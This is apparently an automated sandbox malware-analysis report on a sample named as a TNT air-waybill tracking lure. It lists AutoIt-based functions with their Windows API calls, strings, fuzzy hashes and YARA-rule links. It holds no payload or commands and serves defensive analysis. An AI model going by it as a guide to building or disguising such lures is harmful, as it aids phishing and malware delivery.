API String ID: 3974789173-0
Opcode ID: 1af1eb3a6a26d5ee36d3c3c13a20b636784bec647339f5ded2e4c5d55353eca5
Instruction ID: e782d29e60199a4d03b085c0b01a71176b34a6561b8e39d127d32b31b30a150f
Opcode Fuzzy Hash: 1af1eb3a6a26d5ee36d3c3c13a20b636784bec647339f5ded2e4c5d55353eca5
Instruction Fuzzy Hash: 9AE04F36611212DBD7306FF05D0CB673BB8EF55B91F144838B245CA040DE2884428755

Function 00AFB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00AFB4BE

Strings

Container, xrefs: 00AFB43B
AutoIt3GUI, xrefs: 00AFB436

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 672747e27546f6a930a9bc05097faf344243fefa09067ec8b539b7d85a7e733b
Instruction ID: 619488eba9d0353282feabe06a61c44e452605e2285d19ac97a94de6fe6c6514
Opcode Fuzzy Hash: 672747e27546f6a930a9bc05097faf344243fefa09067ec8b539b7d85a7e733b
Instruction Fuzzy Hash: 4C915C752106059FDB14DF68C884B6AB7F9FF48711F2085ADFA46CB6A1DB70E841CB60

Function 00B0AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00ABFC86: _wcscpy.LIBCMT ref: 00ABFCA9

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

__wcsnicmp.LIBCMT ref: 00B0B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B0B0F6

Strings

LPT, xrefs: 00B0B027

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: b74efcb8501f7f1f518f64aa5ad45369ab4c4a35376f55a8846597229586f024
Instruction ID: 8d2f85570e3fadbd5c9d4a14a48f97b4a8cbe7695a11255851b629da8b4bbd20
Opcode Fuzzy Hash: b74efcb8501f7f1f518f64aa5ad45369ab4c4a35376f55a8846597229586f024
Instruction Fuzzy Hash: F8619175A10219AFCB14DF94D991EAFBBF8EF09310F1040A9F916BB291DB30AE40CB50

Function 00AB2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00AB2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00AB2981

Strings

@, xrefs: 00AB2975

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 0c325c1bce8ccec5031b707e80cb4ea98efe943bfa825100f0e98ea0dbe5fb66
Instruction ID: 9e4c52fe9f923ddc9b550424d50e4e7d633f0487a60aab3a5a4b4ea8ab4d786e
Opcode Fuzzy Hash: 0c325c1bce8ccec5031b707e80cb4ea98efe943bfa825100f0e98ea0dbe5fb66
Instruction Fuzzy Hash: 76513972418744ABE320EF10D986BAFBBE8FF86344F41885DF2D8421A1DF358529CB56

Function 00B09734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00AA4F0B: __fread_nolock.LIBCMT ref: 00AA4F29

_wcscmp.LIBCMT ref: 00B09824
_wcscmp.LIBCMT ref: 00B09837

Strings

FILE, xrefs: 00B09770

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: c1ae8d3a5380539bd53a0d236959461c43936659b713057590b44f4d7f09b329
Instruction ID: 3b07097a130c39dccf1c1be51b7064a7b0e692fefef7b64c9db5c855e978cdf3
Opcode Fuzzy Hash: c1ae8d3a5380539bd53a0d236959461c43936659b713057590b44f4d7f09b329
Instruction Fuzzy Hash: 46417571A00219BADF219AA4CC46FEFBBF9DF8A710F0144A9F904B71C1DBB199058B61

Function 00B1258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B1259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B125D4

Strings

|, xrefs: 00B125A5

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 5ece96adf79f48ceeb37e5ec5547c5e539e242b9830c9cb15489cd3ea190719a
Instruction ID: 765adf3660b43e3bb9216e9d01d2c1ea5cccdeecf2c0ff0df9f883f6e0da2b7f
Opcode Fuzzy Hash: 5ece96adf79f48ceeb37e5ec5547c5e539e242b9830c9cb15489cd3ea190719a
Instruction Fuzzy Hash: B7310671800219EBCF11EFA0CD85EEEBFB9FF09350F100069F915A61A2EB315956DB60

Function 00B27A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00B27B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B27B76

Strings

', xrefs: 00B27ACA

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 0c4cf2c26fcd8466f2c0a7879ca6b5613ceb1b86012ceabe82627c5572494872
Instruction ID: 531d4029a42916beb7effdc4e502cb937d30371d9bfb734e5b8eae5c3b10682a
Opcode Fuzzy Hash: 0c4cf2c26fcd8466f2c0a7879ca6b5613ceb1b86012ceabe82627c5572494872
Instruction Fuzzy Hash: A5413974A4521A9FDB14CF64D990BEABBF5FF09310F1001AAE908EB391DB70A951CF94

Function 00B26A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00B26B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B26B53

Strings

static, xrefs: 00B26AB3

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: c9a5d0496a2be449f96e4f2cff72f059beee0eb2de77e0a6b997001ea05e3cda
Instruction ID: ac7eb336fa2b1e8cf8fee5dc82333767696c0ee079a616171bb6a082b436ecf0
Opcode Fuzzy Hash: c9a5d0496a2be449f96e4f2cff72f059beee0eb2de77e0a6b997001ea05e3cda
Instruction Fuzzy Hash: 38318A71200614AADB109F68DC85BFB73F9FF49760F108669F9A9D71A0DB34AC91CB60

Function 00B028A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B0294C

Strings

0, xrefs: 00B0290A

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 658edb366557d78e07f8fb06fc39671991f582273ba980bb3f900b2f69edb696
Instruction ID: 34bb63cd091058b2aa2730d6a768684dc8355551855e4ae8c296bf0a9b964bf2
Opcode Fuzzy Hash: 658edb366557d78e07f8fb06fc39671991f582273ba980bb3f900b2f69edb696
Instruction Fuzzy Hash: AB318231A003059FEB25CF98C989BAEBFF9EF45350F1440B9E985A61E1DB709948CB51

Function 00B139E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00B13A66

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Strings

, $, xrefs: 00B13AA6
AUTOITCALLVARIABLE%d, xrefs: 00B13A58

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 6d49c0aaa9188f04057bc382315489a38f7935b19d1c358c6db32a110136b2dd
Instruction ID: ab8caf12615d8562649330a0ff610e73bd88cbd531fa271fba5b0a72c31dc3ca
Opcode Fuzzy Hash: 6d49c0aaa9188f04057bc382315489a38f7935b19d1c358c6db32a110136b2dd
Instruction Fuzzy Hash: 19215031600219ABCF10EF64CD81AEE77F5AF49710F900494F945B7192EB34EA45CB65

Function 00B266D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B26761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B2676C

Strings

Combobox, xrefs: 00B2672E

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 0e3c7e2e8ac04d62951df01cd2ac647d824ac21227b6718ea8b993888d505840
Instruction ID: 3489fc45bb1d713bd9d34125b2709b80b4bc0ed472f30df2399c039542bc05c0
Opcode Fuzzy Hash: 0e3c7e2e8ac04d62951df01cd2ac647d824ac21227b6718ea8b993888d505840
Instruction Fuzzy Hash: E311B275200219AFEF218F54EC80EBB37AAEB58368F100569FD18972A0D671DC5197A0

Function 00B26C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91

GetWindowRect.USER32(00000000,?), ref: 00B26C71
GetSysColor.USER32(00000012), ref: 00B26C8B

Strings

static, xrefs: 00B26C4E

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 5bc4cc1d03d2d6644040004a751aff5120e73e3b432c12b0d9dae6825bbdfb26
Instruction ID: 49561f7227adf6a0254325d001407229b9a5b7e316bccd5905b2e0c3f6ab58cc
Opcode Fuzzy Hash: 5bc4cc1d03d2d6644040004a751aff5120e73e3b432c12b0d9dae6825bbdfb26
Instruction Fuzzy Hash: 1F21067251021AAFDB14DFA8DC45AFA7BF8FB08314F004669F999D3250DA35E8519B60

Function 00B26920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00B269A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B269B1

Strings

edit, xrefs: 00B26986

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: aeeb470548fdf8b9b852a2b08a032ee021745f9e10e50e27c9e51a4a0dcf761d
Instruction ID: 2aa309ce33921034fe887b5dbb7af16f9ab7a7078ea065d8f80ae4ba9c13a8bb
Opcode Fuzzy Hash: aeeb470548fdf8b9b852a2b08a032ee021745f9e10e50e27c9e51a4a0dcf761d
Instruction Fuzzy Hash: 9B11BC71100229ABEF108F64EC84EFB37A9EB09374F504764F9A8971E0CB35DC919BA0

Function 00B029AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B02A41

Strings

0, xrefs: 00B02A18

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 80e15c8661ea7dc4ff973d69329a2bc06010992dc34ed787a59cdb7b8907986b
Instruction ID: ed4e132ef474367fc80f24503fb6349103f85982f1c7d69b1d8da7d0c7e47ffb
Opcode Fuzzy Hash: 80e15c8661ea7dc4ff973d69329a2bc06010992dc34ed787a59cdb7b8907986b
Instruction Fuzzy Hash: 6E118E32A01124AADF35DB98D888BAA7BE8EB45350F1540A1E955A72D0DB70AD0ECB91

Function 00B121D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B1222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B12255

Strings

<local>, xrefs: 00B1221D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 597c6c95103c0bbb4d729df72e46a49ce1dca2b93ab425ca8afd74a11e3fe090
Instruction ID: c742ac1639f68ed35a5dd9c3a74351dd89532a3a58a856b489f4a9501b6c432d
Opcode Fuzzy Hash: 597c6c95103c0bbb4d729df72e46a49ce1dca2b93ab425ca8afd74a11e3fe090
Instruction Fuzzy Hash: 3D11E070501225BADB258F118CC4EFBFBE8FF06351F5082AAF90456000E2705DE5D6F0

Function 00AF8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AF8E73

Strings

ComboBox, xrefs: 00AF8E12
ListBox, xrefs: 00AF8E3D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 66f31dcd080b54a4b41422e3bc6ce292c179370b4ef83c383e92425984a8c3e9
Instruction ID: a74edc93895e74cf5a9a0f8025bfdfef4c8f09d76019c2080f755d119cec1400
Opcode Fuzzy Hash: 66f31dcd080b54a4b41422e3bc6ce292c179370b4ef83c383e92425984a8c3e9
Instruction Fuzzy Hash: 0A01F1B1B41219AB8B14EBE0CD459FE73A8EF06320B040A59F925572E1DF35980CC650

Function 00AF8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00AF8D6B

Strings

ComboBox, xrefs: 00AF8D0A
ListBox, xrefs: 00AF8D35

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: e515754d4f160860a730222cb67897a2feddc08978b34c7ab4f56b797f3b890a
Instruction ID: d4001b72b45479612384053259c6045d222c722a4f3e8844e7af4630808a2dcf
Opcode Fuzzy Hash: e515754d4f160860a730222cb67897a2feddc08978b34c7ab4f56b797f3b890a
Instruction Fuzzy Hash: 4F01BCB1B4110DABCB15EBE0CA52AFF77A89F16340F100069B906672E1DF285A0CD6A1

Function 00AF8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00AFAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00AF8DEE

Strings

ComboBox, xrefs: 00AF8D8F
ListBox, xrefs: 00AF8DBA

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: e81983999b99806c77a96ec26f3693eeba2dbc2ff8c62be94defc12d88272377
Instruction ID: 1c251343ca22e2fbd5bd693aa3e8f5c3c233fc9834cb6ee85c0471671b221aad
Opcode Fuzzy Hash: e81983999b99806c77a96ec26f3693eeba2dbc2ff8c62be94defc12d88272377
Instruction Fuzzy Hash: D7018FB1A41109A7DB15EBE4CA42AFF77A89F16340F104059B905672D2DF294E0CD6B1

Function 00B04F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00B04F46
_wcscmp.LIBCMT ref: 00B04F58

Strings

#32770, xrefs: 00B04F52

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

